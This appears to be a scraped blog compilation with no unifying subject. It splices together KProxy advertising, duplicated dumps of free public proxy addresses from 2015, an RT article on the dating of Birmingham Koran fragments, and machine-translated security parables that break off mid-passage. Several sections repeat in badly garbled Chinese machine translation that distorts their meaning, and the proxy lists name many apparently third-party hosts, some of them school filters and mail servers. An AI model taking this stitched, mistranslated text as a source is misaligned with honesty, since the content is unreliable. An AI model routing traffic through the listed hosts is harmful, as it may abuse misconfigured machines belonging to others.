KProxy browser is a Portable Firefox with KProxy Extension preconfigured. Download, unzip it and enjoy. It is a 100% portable solution, copy it in a pen drive and use it everywhere.
kproxy Agent
need a desktop application?
KProxy Agent is our legacy software that works great, but its features are not as good as KProxy Extension. We recommend to use the KProxy Extension.

It is a 100% pure java program that can be installed in any computer with Java enabled. Install java from here.

It works like a proxy in your computer, just configure the proxy settings of any program (or even Windows) or any device and change their location instantly.

 =====


資料下載
ķ代理擴展
KProxy拓反對審查制度的最終武器。 繞過任何過濾器,保護您的身份只需點擊一下鼠標。 這是非常容易使用,它在Internet代理的偉大工程(在工作中,學校,圖書館等)。

享受完整的安全,甚至在公共WIFI連接。 防止黑客竊取您的個人密碼,銀行帳戶和信用卡信息。

100%的網站將工作
100%安全
比VPN更好
游離
KProxy擴展不只是您的瀏覽器的工具。 這將在代理應用程序準備好了一切你的瀏覽器轉換,只需配置任何程序(甚至是Windows)或任何設備的代理服務器設置,改變他們的位置瞬間。

Chrome瀏覽器


火狐

ķ代理瀏覽器
需要便攜式解決方案?
KProxy瀏覽器是一款便攜式的Firefox與KProxy擴展預先配置。 下載,解壓縮和享受。 這是一個100%的便攜式解決方案,將其複製在一個筆式驅動器並使用它無處不在。
ķ委託代理
需要一個桌面應用程序?
KProxy代理是我們的傳統軟件,它的偉大工程,但它的功能不如KProxy擴展。 我們建議使用KProxy擴展。

它是一個可以安裝在任何一台電腦與Java功能的100%純Java程序。 從這裡安裝Java。

它的工作原理就像在計算機中的代理,只是配置任何程序(甚至是Windows)或任何設備的代理服務器設置,改變他們的位置瞬間。

跨平台


 =====

 http://tools.rosinstrument.com/proxy/


FREE PUBLIC PROXY SERVERS LIST



PROXY DATABASE QUERIES AND LISTS.

Mon Sep 14 14:35:27 2015 GMT full dump
total:145,new:42,SOCKS:55,HTTP:90Kb/s
co
us
fr
th
sg
tw
tw
us
ar
us
us
us
ru
cl
us
us
us
ge
mv
br
gr
ru
ua
de
us
us
jp
ru
cn
cn
cn
gb
ru
ua
n/a
ng
cn
cn
gb
cn
cn
cn
cn
id
n/a
de
ca
cn
cn
ir
us
kr
id
cn
np
ve
br
cn
gb
de
us
us
rs
fr
ir
cn
cn
kr
ru
cn
cn
us
cn
ir
fr
ru
us
us
tr
fr
cn
cn
cn
cn
n/a
ir
cn
cn
us
us
fr
ca
il
us
us
us
py
ua
ru
se
ua
ru
ru
us
sg
ru
ua
n/a
ru
ua
ru
ru
ua
ru
ru
ru
ru
us
n/a
th
cn
ru
us
ru
ru
ru
ua
ru
us
cn
tr
us
cn
us
ru
fr
tw
cn
ru
ru
n/a
us
se
cn
ru
wimax-cali-190-0-11-210.orbitel.net.co:8080
rrcs-24-123-96-115.central.biz.rr.com:3128
46-233-47-212.rev.cloud.scaleway.com:3129
ppp-124-121-98-42.revip2.asianet.co.th:80
bbcache-220-255-3-170.singnet.com.sg:80
123-192-10-19.dynamic.kbronet.com.tw:80
125-227-163-128.hinet-ip.hinet.net:3128
rrcs-108-176-90-94.nys.biz.rr.com:3128
host33.190-136-18.telecom.net.ar:8090
barracuda.nod-valley.k12.ia.us:3128
208.65.181.74.static.etheric.net:80
34.151.45.66.cm.sunflower.com:8080
dhcp-10-231-129-5.metro86.ru:3130
pc-253-103-45-190.cm.vtr.net:8080
ns515309.ip-167-114-174.net:3128
sophosweb9.ucps.k12.nc.us:8080
sophosweb8.ucps.k12.nc.us:8080
188-169-176-94.dsl.utg.ge:8080
harvester.video2home.net:8080
r334-pf-tuma.ibys.com.br:3128
od4q40.static.otenet.gr:8080
vmi24035.contabo.host:3128
vds32.xserver-dns.com:8080
vmi15075.contabo.host:3128
ragapa3.attwifi.com:3129
ragapa2.attwifi.com:3129
cherysunzhang.com:3128
wow2.alfa-tel.net:7777
124.206.167.250:3128
218.92.227.166:15275
218.92.227.168:13669
90.223.242.174:3128
87.245.148.205:8080
188.191.99.248:8088
103.253.146.90:8080
197.210.246.30:8080
223.159.171.92:3128
117.177.243.42:8086
87.236.214.178:8118
61.175.221.244:3128
122.226.142.52:3128
60.191.170.122:3128
121.199.32.149:3128
124.81.226.146:8080
rahulreddy.me:3128
92.222.237.20:8898
70.83.253.100:3128
120.195.205.223:80
218.193.132.35:808
78.39.114.100:3128
52.69.232.223:3128
61.74.244.182:3128
183.91.86.195:8080
61.166.56.177:3128
202.52.248.50:8080
200.84.75.172:8080
200.192.211.6:8080
61.175.219.98:3128
82.44.143.11:8080
web01.bam.st:3128
52.22.22.161:3128
69.12.74.128:3128
94.100.50.54:8080
91.198.44.70:3128
46.32.31.118:8080
61.174.10.22:8080
120.195.199.98:80
61.77.196.91:3128
79.140.18.69:3128
183.207.228.11:83
117.177.243.42:83
71.246.217.196:80
125.39.17.91:3128
91.98.111.56:8080
89.30.115.146:80
92.255.174.88:80
70.37.82.58:8081
70.39.189.6:9090
95.0.218.12:8080
91.198.44.4:3128
113.215.0.130:81
117.136.234.7:82
211.90.28.102:80
117.136.234.9:80
103.27.67.2:8080
2.180.1.168:8080
219.239.83.6:80
111.12.83.13:80
69.30.239.3:80
69.30.239.4:80
men75-7-82-239-166-126.fbx.proxad.net:54468
s0106bcee7b5602d0.cg.shawcable.net:16497
109-186-167-82.bb.netvision.net.il:54397
c-76-124-41-9.hsd1.pa.comcast.net:16366
173-21-122-162.client.mchsi.com:29378
173-26-203-236.client.mchsi.com:13171
host-30.12.217.201.copaco.com.py:1080
host-176-36-163-239.la.net.ua:46782
94.41.107.206.dynamic.ufanet.ru:1080
170.187.8.81.sta.ac-net.se:30277
178.159.127.175:43113
176.212.125.130:22596
192.162.102.223:17681
173.209.167.241:44885
175.156.251.239:61702
192.162.102.223:23763
159.224.13.140:14105
185.72.176.204:33233
176.122.61.228:10475
159.224.97.142:23323
178.140.33.136:13937
178.140.71.123:20610
178.159.127.99:52732
176.122.61.247:36237
194.63.141.110:21632
194.63.141.110:24006
178.209.100.98:29638
149.129.31.155:35354
162.216.208.48:55197
110.77.137.248:59317
115.29.139.240:54321
176.121.56.12:11520
173.162.16.37:16386
176.107.13.20:48511
176.215.5.125:14319
46.150.145.45:49083
176.117.86.60:17212
158.46.14.253:13734
149.129.3.161:38432
116.237.235.41:8118
176.41.144.59:18210
173.71.173.91:17177
60.29.233.191:32561
173.84.49.74:39966
93.189.42.43:34139
90.46.182.99:33514
210.202.25.51:3389
202.43.147.226:1080
fusionbet.ru:5441
195.91.191.59:1080
karytko.com:34511
174.34.92.198:1080
193.26.6.97:57212
113.105.111.6:1080
176.215.11.3:1080
8
8
41
9
15
13
6
4
5
36
1
29
35
11
23
33
33
12
18
1
5
52
38
5
22
17
13
1
5
4
4
63
52
12
12
8
7
7
6
6
5
3
2
1
31
17
16
12
12
11
10
8
8
7
5
4
4
1
53
47
40
34
28
14
14
11
9
7
7
7
6
4
3
1
73
37
23
23
17
14
9
9
9
7
3
<1
7
1
25
23
2
30
7
32
48
33
21
68
28
17
49
37
32
27
20
9
77
65
56
45
43
41
40
37
34
33
27
24
22
21
5
51
48
44
43
39
33
31
24
22
13
12
8
36
33
21
18
14
74
68
45
31
11
6
60
RSS more, more, howto
port vs. protocol legend:
plus (+) sign, port 1080 SOCKS
minus (-) signCONNECT
no signHTTP
CONNECT (HTTPS) proxy
Mon Sep 14 14:37:36 2015 GMT raw dump
host:port, TOTAL 152, new 8Kb/s
81-235-47-212.rev.cloud.scaleway.com:3129
ppp-124-121-98-42.revip2.asianet.co.th:80
static-186-121-212-90.acelerate.net:3128
static-192-69-134-180.ptr.terago.net:80
ezecom.110.74.200.76.ezecom.com.kh:8080
adsl97-239-centenario.neunet.com.ar:80
bzq-82-81-18-51.red.bezeqint.net:8080
187-176-105-63.dynamic.axtel.net:8080
211-72-13-116.hinet-ip.hinet.net:3128
adsl-f49-s186.nortenet.pt:8085
ip-415e.sunline.net.ua:3128
vmi15075.contabo.host:3128
mailer01.flysaa.com:80
mpe-46-175.mpe.lv:8080
ip95.178.ulttk.ru:8080
mail.ptz.2gis.ru:8080
203.113.135.131:3130
128.199.147.170:8888
211.218.126.189:3128
117.168.212.149:8123
186.226.252.203:3128
221.228.210.198:8080
220.170.198.207:3128
210.242.250.230:3128
103.224.100.117:8080
179.106.153.140:8080
221.214.166.181:3128
181.176.210.240:8080
196.205.203.100:8080
190.198.150.211:8080
124.172.139.169:8888
188.226.174.81:8888
167.114.131.61:3128
87.245.148.205:8080
190.63.157.226:8081
213.145.139.46:3128
187.121.131.22:3128
189.34.193.130:3128
31.171.233.200:8080
187.60.121.210:3128
121.12.249.120:9999
119.29.116.149:3128
125.140.118.12:3128
146.255.78.254:8080
125.88.144.189:8080
177.190.209.10:3128
185.23.130.234:8080
211.104.168.75:3128
111.90.188.146:8080
124.206.98.246:3128
223.159.171.92:3128
177.21.227.129:8080
211.195.74.100:3128
200.223.97.194:8080
154.66.253.192:8080
182.253.72.144:8080
218.63.182.121:3128
219.238.12.248:3128
61.168.113.131:3128
79.132.220.198:8080
61.163.178.146:3128
60.191.146.188:3128
122.226.172.18:3128
117.244.15.243:3128
181.44.147.245:8080
212.230.41.192:8080
162.243.61.55:8000
168.9.128.254:8080
168.9.128.153:8080
194.44.187.61:3128
82.114.78.105:8080
148.214.232.2:8080
177.55.254.49:8080
190.98.162.22:8080
177.92.62.254:3128
110.78.167.94:8080
180.143.200.141:80
103.25.179.12:8080
27.131.14.194:8080
118.70.80.136:3128
169.255.77.27:8080
61.74.244.184:3128
183.89.74.204:8080
27.200.89.238:9797
61.134.34.148:3128
220.248.41.106:110
222.220.113.4:3128
202.74.243.21:8080
211.137.39.21:8080
180.143.200.142:80
118.96.42.150:8080
125.227.1.122:3128
219.238.0.188:3128
218.77.97.173:3128
182.75.58.147:8888
110.49.208.55:8080
78.39.114.100:3128
218.7.141.126:3128
200.109.66.30:3128
219.132.8.150:3128
218.24.243.70:3128
105.237.146.132:80
41.162.73.148:8080
123.51.219.80:3128
187.111.0.174:8080
95.180.63.202:8080
202.145.3.242:8080
201.144.9.102:8080
198.11.172.39:3128
91.209.54.54:3128
95.82.223.12:8081
50.106.45.72:8118
87.76.12.174:8080
177.92.40.76:3128
59.49.52.243:9999
103.249.91.1:8080
190.5.77.216:3128
14.36.49.120:3128
187.76.1.146:8080
106.44.176.250:80
190.52.192.1:8080
59.39.88.190:8080
211.48.77.58:3128
36.75.214.55:8080
218.61.33.56:3128
162.223.88.243:80
89.26.71.134:8080
93.95.46.238:3128
111.44.228.138:80
116.50.27.34:8080
175.103.47.130:80
202.39.61.92:3128
103.253.145.81:80
218.75.53.22:3128
41.160.39.75:8080
110.136.247.38:80
115.124.75.150:80
76.8.155.15:3128
89.30.115.146:80
70.37.82.58:8081
69.63.114.3:3128
104.44.130.71:80
84.22.35.34:3129
203.67.6.56:3128
103.27.67.2:8080
190.63.140.71:80
52.24.150.4:9999
5.160.246.5:3128
47.88.0.146:3128
91.209.54.54:80
47.88.0.23:3128
41.67.5.94:3128
43
8
3
29
2
3
12
5
2
4
13
3
16
14
11
17
12
12
12
7
5
5
5
4
4
4
3
3
2
1
1
57
37
34
25
19
16
16
15
14
13
11
11
10
10
10
8
8
8
7
7
7
7
6
6
5
5
5
5
5
5
4
3
3
2
1
48
38
38
33
25
24
22
16
15
12
11
11
11
11
9
9
9
8
7
7
7
7
6
6
6
5
5
5
5
4
4
4
4
4
3
3
3
3
2
2
2
1
1
35
34
21
17
16
15
14
11
11
11
10
9
9
6
6
6
6
6
4
4
4
4
4
4
3
2
1
1
36
31
30
27
17
10
4
4
4
2
2
1
43
2
<1
RSS more
Type URL for anonymous surf via random CGI proxy
increase anonymity by chaining CGI proxy:
 

E-mail Facebook VKontakte Google Digg del.icio.us BlinkList NewsVine Reddit YahooMyWeb LiveJournal Blogmarks TwitThis Live News2.ru BobrDobr.ru Memori.ru MoeMesto.ru


misc. database query examples




 =====
 http://tools.rosinstrument.com/proxy/

免費公共代理服務器列表


total:145,new:42,SOCKS:55,HTTP:90Kb/s
co
us
fr
th
sg
tw
tw
us
ar
us
us
us
ru
cl
us
us
us
ge
mv
br
gr
ru
ua
de
us
us
jp
ru
cn
cn
cn
gb
ru
ua
n/a
ng
cn
cn
gb
cn
cn
cn
cn
id
n/a
de
ca
cn
cn
ir
us
kr
id
cn
np
ve
br
cn
gb
de
us
us
rs
fr
ir
cn
cn
kr
ru
cn
cn
us
cn
ir
fr
ru
us
us
tr
fr
cn
cn
cn
cn
n/a
ir
cn
cn
us
us
fr
ca
il
us
us
us
py
ua
ru
se
ua
ru
ru
us
sg
ru
ua
n/a
ru
ua
ru
ru
ua
ru
ru
ru
ru
us
n/a
th
cn
ru
us
ru
ru
ru
ua
ru
us
cn
tr
us
cn
us
ru
fr
tw
cn
ru
ru
n/a
us
se
cn
ru
wimax-cali-190-0-11-210.orbitel.net.co:8080
rrcs-24-123-96-115.central.biz.rr.com:3128
46-233-47-212.rev.cloud.scaleway.com:3129
ppp-124-121-98-42.revip2.asianet.co.th:80
bbcache-220-255-3-170.singnet.com.sg:80
123-192-10-19.dynamic.kbronet.com.tw:80
125-227-163-128.hinet-ip.hinet.net:3128
rrcs-108-176-90-94.nys.biz.rr.com:3128
host33.190-136-18.telecom.net.ar:8090
barracuda.nod-valley.k12.ia.us:3128
208.65.181.74.static.etheric.net:80
34.151.45.66.cm.sunflower.com:8080
dhcp-10-231-129-5.metro86.ru:3130
pc-253-103-45-190.cm.vtr.net:8080
ns515309.ip-167-114-174.net:3128
sophosweb9.ucps.k12.nc.us:8080
sophosweb8.ucps.k12.nc.us:8080
188-169-176-94.dsl.utg.ge:8080
harvester.video2home.net:8080
r334-pf-tuma.ibys.com.br:3128
od4q40.static.otenet.gr:8080
vmi24035.contabo.host:3128
vds32.xserver-dns.com:8080
vmi15075.contabo.host:3128
ragapa3.attwifi.com:3129
ragapa2.attwifi.com:3129
cherysunzhang.com:3128
wow2.alfa-tel.net:7777
124.206.167.250:3128
218.92.227.166:15275
218.92.227.168:13669
90.223.242.174:3128
87.245.148.205:8080
188.191.99.248:8088
103.253.146.90:8080
197.210.246.30:8080
223.159.171.92:3128
117.177.243.42:8086
87.236.214.178:8118
61.175.221.244:3128
122.226.142.52:3128
60.191.170.122:3128
121.199.32.149:3128
124.81.226.146:8080
rahulreddy.me:3128
92.222.237.20:8898
70.83.253.100:3128
120.195.205.223:80
218.193.132.35:808
78.39.114.100:3128
52.69.232.223:3128
61.74.244.182:3128
183.91.86.195:8080
61.166.56.177:3128
202.52.248.50:8080
200.84.75.172:8080
200.192.211.6:8080
61.175.219.98:3128
82.44.143.11:8080
web01.bam.st:3128
52.22.22.161:3128
69.12.74.128:3128
94.100.50.54:8080
91.198.44.70:3128
46.32.31.118:8080
61.174.10.22:8080
120.195.199.98:80
61.77.196.91:3128
79.140.18.69:3128
183.207.228.11:83
117.177.243.42:83
71.246.217.196:80
125.39.17.91:3128
91.98.111.56:8080
89.30.115.146:80
92.255.174.88:80
70.37.82.58:8081
70.39.189.6:9090
95.0.218.12:8080
91.198.44.4:3128
113.215.0.130:81
117.136.234.7:82
211.90.28.102:80
117.136.234.9:80
103.27.67.2:8080
2.180.1.168:8080
219.239.83.6:80
111.12.83.13:80
69.30.239.3:80
69.30.239.4:80
men75-7-82-239-166-126.fbx.proxad.net:54468
s0106bcee7b5602d0.cg.shawcable.net:16497
109-186-167-82.bb.netvision.net.il:54397
c-76-124-41-9.hsd1.pa.comcast.net:16366
173-21-122-162.client.mchsi.com:29378
173-26-203-236.client.mchsi.com:13171
host-30.12.217.201.copaco.com.py:1080
host-176-36-163-239.la.net.ua:46782
94.41.107.206.dynamic.ufanet.ru:1080
170.187.8.81.sta.ac-net.se:30277
178.159.127.175:43113
176.212.125.130:22596
192.162.102.223:17681
173.209.167.241:44885
175.156.251.239:61702
192.162.102.223:23763
159.224.13.140:14105
185.72.176.204:33233
176.122.61.228:10475
159.224.97.142:23323
178.140.33.136:13937
178.140.71.123:20610
178.159.127.99:52732
176.122.61.247:36237
194.63.141.110:21632
194.63.141.110:24006
178.209.100.98:29638
149.129.31.155:35354
162.216.208.48:55197
110.77.137.248:59317
115.29.139.240:54321
176.121.56.12:11520
173.162.16.37:16386
176.107.13.20:48511
176.215.5.125:14319
46.150.145.45:49083
176.117.86.60:17212
158.46.14.253:13734
149.129.3.161:38432
116.237.235.41:8118
176.41.144.59:18210
173.71.173.91:17177
60.29.233.191:32561
173.84.49.74:39966
93.189.42.43:34139
90.46.182.99:33514
210.202.25.51:3389
202.43.147.226:1080
fusionbet.ru:5441
195.91.191.59:1080
karytko.com:34511
174.34.92.198:1080
193.26.6.97:57212
113.105.111.6:1080
176.215.11.3:1080
8
8
41
9
15
13
6
4
5
36
1
29
35
11
23
33
33
12
18
1
5
52
38
5
22
17
13
1
5
4
4
63
52
12
12
8
7
7
6
6
5
3
2
1
31
17
16
12
12
11
10
8
8
7
5
4
4
1
53
47
40
34
28
14
14
11
9
7
7
7
6
4
3
1
73
37
23
23
17
14
9
9
9
7
3
<1
7
1
25
23
2
30
7
32
48
33
21
68
28
17
49
37
32
27
20
9
77
65
56
45
43
41
40
37
34
33
27
24
22
21
5
51
48
44
43
39
33
31
24
22
13
12
8
36
33
21
18
14
74
68
45
31
11
6
60
RSS ,howto中
端口與協議的傳說:
加號(+)號, 端口 1080 SOCKS
減號( - )符號 CONNECT
沒有任何跡象 HTTP
CONNECT(HTTPS)代理
週一09月14日14時37分36秒格林尼治標準時間2015年 原始轉儲
host:port, TOTAL 152, new 8Kb/s
81-235-47-212.rev.cloud.scaleway.com:3129
ppp-124-121-98-42.revip2.asianet.co.th:80
static-186-121-212-90.acelerate.net:3128
static-192-69-134-180.ptr.terago.net:80
ezecom.110.74.200.76.ezecom.com.kh:8080
adsl97-239-centenario.neunet.com.ar:80
bzq-82-81-18-51.red.bezeqint.net:8080
187-176-105-63.dynamic.axtel.net:8080
211-72-13-116.hinet-ip.hinet.net:3128
adsl-f49-s186.nortenet.pt:8085
ip-415e.sunline.net.ua:3128
vmi15075.contabo.host:3128
mailer01.flysaa.com:80
mpe-46-175.mpe.lv:8080
ip95.178.ulttk.ru:8080
mail.ptz.2gis.ru:8080
203.113.135.131:3130
128.199.147.170:8888
211.218.126.189:3128
117.168.212.149:8123
186.226.252.203:3128
221.228.210.198:8080
220.170.198.207:3128
210.242.250.230:3128
103.224.100.117:8080
179.106.153.140:8080
221.214.166.181:3128
181.176.210.240:8080
196.205.203.100:8080
190.198.150.211:8080
124.172.139.169:8888
188.226.174.81:8888
167.114.131.61:3128
87.245.148.205:8080
190.63.157.226:8081
213.145.139.46:3128
187.121.131.22:3128
189.34.193.130:3128
31.171.233.200:8080
187.60.121.210:3128
121.12.249.120:9999
119.29.116.149:3128
125.140.118.12:3128
146.255.78.254:8080
125.88.144.189:8080
177.190.209.10:3128
185.23.130.234:8080
211.104.168.75:3128
111.90.188.146:8080
124.206.98.246:3128
223.159.171.92:3128
177.21.227.129:8080
211.195.74.100:3128
200.223.97.194:8080
154.66.253.192:8080
182.253.72.144:8080
218.63.182.121:3128
219.238.12.248:3128
61.168.113.131:3128
79.132.220.198:8080
61.163.178.146:3128
60.191.146.188:3128
122.226.172.18:3128
117.244.15.243:3128
181.44.147.245:8080
212.230.41.192:8080
162.243.61.55:8000
168.9.128.254:8080
168.9.128.153:8080
194.44.187.61:3128
82.114.78.105:8080
148.214.232.2:8080
177.55.254.49:8080
190.98.162.22:8080
177.92.62.254:3128
110.78.167.94:8080
180.143.200.141:80
103.25.179.12:8080
27.131.14.194:8080
118.70.80.136:3128
169.255.77.27:8080
61.74.244.184:3128
183.89.74.204:8080
27.200.89.238:9797
61.134.34.148:3128
220.248.41.106:110
222.220.113.4:3128
202.74.243.21:8080
211.137.39.21:8080
180.143.200.142:80
118.96.42.150:8080
125.227.1.122:3128
219.238.0.188:3128
218.77.97.173:3128
182.75.58.147:8888
110.49.208.55:8080
78.39.114.100:3128
218.7.141.126:3128
200.109.66.30:3128
219.132.8.150:3128
218.24.243.70:3128
105.237.146.132:80
41.162.73.148:8080
123.51.219.80:3128
187.111.0.174:8080
95.180.63.202:8080
202.145.3.242:8080
201.144.9.102:8080
198.11.172.39:3128
91.209.54.54:3128
95.82.223.12:8081
50.106.45.72:8118
87.76.12.174:8080
177.92.40.76:3128
59.49.52.243:9999
103.249.91.1:8080
190.5.77.216:3128
14.36.49.120:3128
187.76.1.146:8080
106.44.176.250:80
190.52.192.1:8080
59.39.88.190:8080
211.48.77.58:3128
36.75.214.55:8080
218.61.33.56:3128
162.223.88.243:80
89.26.71.134:8080
93.95.46.238:3128
111.44.228.138:80
116.50.27.34:8080
175.103.47.130:80
202.39.61.92:3128
103.253.145.81:80
218.75.53.22:3128
41.160.39.75:8080
110.136.247.38:80
115.124.75.150:80
76.8.155.15:3128
89.30.115.146:80
70.37.82.58:8081
69.63.114.3:3128
104.44.130.71:80
84.22.35.34:3129
203.67.6.56:3128
103.27.67.2:8080
190.63.140.71:80
52.24.150.4:9999
5.160.246.5:3128
47.88.0.146:3128
91.209.54.54:80
47.88.0.23:3128
41.67.5.94:3128
43
8
3
29
2
3
12
5
2
4
13
3
16
14
11
17
12
12
12
7
5
5
5
4
4
4
3
3
2
1
1
57
37
34
25
19
16
16
15
14
13
11
11
10
10
10
8
8
8
7
7
7
7
6
6
5
5
5
5
5
5
4
3
3
2
1
48
38
38
33
25
24
22
16
15
12
11
11
11
11
9
9
9
8
7
7
7
7
6
6
6
5
5
5
5
4
4
4
4
4
3
3
3
3
2
2
2
1
1
35
34
21
17
16
15
14
11
11
11
10
9
9
6
6
6
6
6
4
4
4
4
4
4
3
2
1
1
36
31
30
27
17
10
4
4
4
2
2
1
43
2
<1
RSS 更多
 雜項。 數據庫查詢的例子
 =====

 *---update [12 / 09-2015] dynamic DNS update client (DUC) for Windows ,, keep your current IP address and no IP host or domain name you sync with our dynamic update client (DUC).By-http://changyang319.com(TW).&- KPROXY- Free Anonymous Web Proxy -Anonymous Proxy"- &
-http://tools.rosinstrument.com/proxy/ ]--5 Best Free VPNs-
---update[12/09-2015]動態DNS更新客戶端(DUC)的Windows,,保持你當前的IP地址與你無IP主機或域名與我們的動態更新客戶端(DUC)同步。By-http://changyang319.com(TW).-&- KPROXY - Free Anonymous Web Proxy -&
-http://tools.rosinstrument.com/proxy/ ]- Anonymous Proxy"--5 Best Free VPNs-**All The World Lauguage**--

 http://melody-free-shaing.blogspot.com/2015/09/update-1009-2015-from-taiwan-disp.html
 ===Melody.Blog===FOLLOW===>/

 ===################
http://www.rt.com/uk/314095-koran-dates-tested-islam/#.VejZjKuC708.twitter

‘Oldest’ Koran fragments unlikely to pre-date Mohammed – expert

Published time: 2 Sep, 2015.
A Muslim man reads the Koran © Amit Dave

Claims that newly-discovered fragments of an early Koran predate the Prophet Mohammed and destabilize the idea that he revealed the contents have been questioned by an expert on the research team involved.
Carbon dating on the four ancient pages, which were found hidden away in a Birmingham library in August, indicated they were up to 1,370 years old, making them potentially the oldest Koran pages in the world.
Their discovery and dating was expected to throw Islam into disarray given the fragments appeared to have been made far earlier than thought possible, before the Prophet’s lifetime.

Fragments of one of world's earliest Qurans found in Birmingham Uni

RT UK
Muslims take the view that the Koran contains the directly revealed word of God, as shown to Mohammed.
At the time, the University of Oxford’s Dr. Keith Small had told the Independent the fragments give “more ground to what have been peripheral views of the Koran’s genesis, like that Mohamed and his early followers used a text already in existence and shaped it to fit their own political and theological agenda.
However, Birmingham University’s Professor of Christianity and Islam David Thomas has now contested those claims, telling the Independent the Koran fragments could have come from a later period because one of them shows an important clue.

Leave a comment at 3:57
 

There is a big problem with that earlier date range,” he said, adding there were “substantial obstacles in the way” of claims that the fragments predate Islam.
As it turns out, on one of the four surfaces of our fragments we have a chapter division, which would seem to suggest that what we have was once a fully-formed Koran, possibly as early as the sixth century.


 Speetzer @speetzer
Oldest Koran found (1370 yrs old) has geometric drawings unlike the ones printed today Birmingham University reported

Thomas said the seventh century saw a great expansion out of the Arabia peninsula as part of a religious movement.
If that is the case, why would there be such a time lapse between a religious text coming into being in say 570, and a movement 60 years later? It doesn’t add up.
Islamic scholars have also contested the claim that the fragments pre-date Islam, with academic Mustafa Shah, from London's School of Oriental and African Studies, telling the Times “if anything, the manuscript has consolidated traditional accounts of the Koran’s origins.


(58)
Comments More  38
 ==========
 http://www.rt.com/uk/314095-koran-dates-tested-islam/#.VejZjKuC708.twitter

最古老的“古蘭經片段不太可能預先日期穆罕默德 - 專家

穆斯林男子讀古蘭經©阿米特·戴夫
 聲明,早日可蘭經中新發現的片段早於先知穆罕默德和破壞的想法,他透露的內容已被質疑所涉及的研究團隊的專家。
碳測年的古代四大頁,其中發現隱藏在八月伯明翰圖書館表示,他們長達1370年老人,使他們有可能在世界上最古老的古蘭經頁面。
他們的發現和約會,預計拋伊斯蘭教陷入混亂給出的片段似乎已取得遠遠早於認為可能有,先知的一生了。

Fragments of one of world's earliest Qurans found in Birmingham Uni

RT UK
 穆斯林採取古蘭經包含神的直接透露字,如穆罕默德的看法。
當時,牛津大學的基思小博士大學曾告訴獨立的片段給“ 更多地是什麼一直是可蘭經的起源的周邊景色,像穆罕默德和他的早期追隨者使用文本已經存在和塑造它適合自己的政治和神學的議程。“
然而,基督教和伊斯蘭教大衛·托馬斯伯明翰大學的教授,現在已經質疑這些說法,說的是獨立古蘭經片段可能來自後一時期,因為他們中的一個顯示了一個重要的線索。

Leave a comment at 3:57


 有一個很大的問題與更早的日期範圍 ,”他補充說,有人稱,碎片早伊斯蘭教的方式實質性障礙”。
事實證明,我們的片段的四個面,我們有一個章節劃分,這似乎表明,我們所擁有的曾經是一個完全成形的古蘭經,可能早在公元六世紀的一個。”


 Speetzer @speetzer
Oldest Koran found (1370 yrs old) has geometric drawings unlike the ones printed today Birmingham University reported

 托馬斯說,七世紀看到了一個大發展出阿拉伯半島作為一個宗教運動的一部分。
如果是這樣的話,為什麼會有一個宗教文本正在形成中之間的這種時間間隔說570和運動60年代以後? 它不會增加。“
伊斯蘭學者也質疑聲稱,該片段預日期伊斯蘭教,學術穆斯塔法·沙阿,從東方和非洲研究的倫敦的學校,告訴時報“ 如果有的話,稿子已經鞏固了可蘭經的起源的傳統的帳戶。”


(58)
Comments.

 =====
 http://forensics.ru/InFuWo.htm#_ftnref2
 Nikolai Fedotov,
principal analyst InfoWatch;
fnn@fnn.ru

Judgments about information security
sage and teacher Yin Fu in [1],
recorded by his disciples

Chapter 1. Workers


eleven

One teacher complained Sysadmin:
- We have given all our users individual passwords, and they do not want to keep them secret. Write down on pieces of paper and glued to monitors. What should we do? How do I get them?
In the Yin Fu said:
- First, tell me why they do it.
Sysadmin thought and said:
- Maybe they do not consider valuable password?
- Is the password itself is valuable?
- Not alone. Valuable information that is password-protected.
- For some, it is valuable?
- For our enterprise.
- And for users?
- For users, probably not.
- That's right - said the teacher. - Under the password there is nothing of value to our employees. It is necessary to make it.
- What is valuable to them? - Asked Sysadmin.
- Guess with three times - Master laughed.
Sysadmin left enlightened and made on the corporate portal personal pages for all workers. And on those pages it was specified salary. On hearing this, all users are worried about their passwords. The next day in the smoking room discussing salary accountant. On the third day, no one had seen leaflets with passwords.

12

One teacher complained Sysadmin:
- Our Technical Director does not want to comply with security requirements. All supposed to have anti-virus, but it does not put. How to influence it?
- Try to convince him - said Yin Fu Bo.
Sysadmin left to convince, but soon returned disappointed:
- I could not convince him Master.
- Why did it happen so? - I asked Yin Fu During and immediately noticed. - But just answer honestly, without bias and resentment.
Sysadmin thought, he lowered his eyes and said quietly:
- Probably because he knows more than me information security.
- Well, if the Technical Director knows more than you, which is not surprising - said the teacher - that he knows better where need anti-virus, and where not.
- Then what security policy! - Exclaimed Sysadmin.
- Who wrote this policy?
Sysadmin looked down and said,
- I.
Teacher wisely said nothing, and Sysadmin left enlightened.

13

One day in the smoking room users are outraged that the Sysadmin closed all access to the site "Classmates". Yin Fu During heard about this and frowned.
- Why did you shut people access? - He asked the SysAdmin, after the break when they drank coffee.
- Because such sites do not need to work.
- A need for smoking?
- Actually no...
- A coffee drink?
- Well ...
- Well then, - said the teacher - to open people's access.

14

Once Sysadmin wanted to install a local network security scanner.
In the Yin Fu said:
- Do not do that.
- But why?
- Our network of one hundred computers. The scanner you will find two or three vulnerabilities on each of them.
- Well, yes, find ...
- What are you going to do with these vulnerabilities?
Sysadmin thought and did not answer the teacher. Security scanner, he did not put.

15

One teacher complained Sysadmin:
- Anti-Virus does not help. Installed on all workstations, and is updated twice a day. And still every week someone is infected and losing data.
In the Yin Fu shook his head ruefully.
- We must do something - continued Sysadmin.
The teacher nodded slightly. Sysadmin asked:
- Is it better to put all the new multi-core anti-virus or raise centralized backup?
In the Yin Fu said:
- Spend courses for users.

16

Once the director has decided to take a job enikeyschiki. Yin Fu found in the candidate, spoke to him and was pleased. He said the Director:
- This man turned his thoughts to the study. Perhaps he will make a decent worker.
But the security chief objected:
- This man has a criminal record. It is impossible to take the service.
Then Yin Fu During asked:
- How did you hear about this?
- I have a connection.
Venerable Yin gloomy face and told the director:
- Which of the two employees more virtuous? The first committed a crime and has suffered the deserved punishment, which could reason with him. The second has committed a crime himself, incited to commit an offense of the civil servant, with no feeling of guilt and a never will be punished? Which of these two is worthy of nomination?
Chief of Security silently got up and left.

1.7

One director said Yin Fu in about protection against internal threats. He said:
- In the outside world there are a hundred people who would like to get confidential information from your network. And there are five who are able to do so. But these hundred unlikely to meet with these five.
More Master said:
- And in your internal network has five members who would like to get confidential information. And there are a hundred who can do it. And they have already met.

18

Once the director came to the Yin counsel for advice. The director said:
- I would like to force all users to comply with strict safety rules. But then they will be offended at me and will work worse. I would like to give users complete freedom. But then they pick up viruses, divulge confidential information, and our business will suffer. How do I find a middle ground?
In the Yin Fu said:
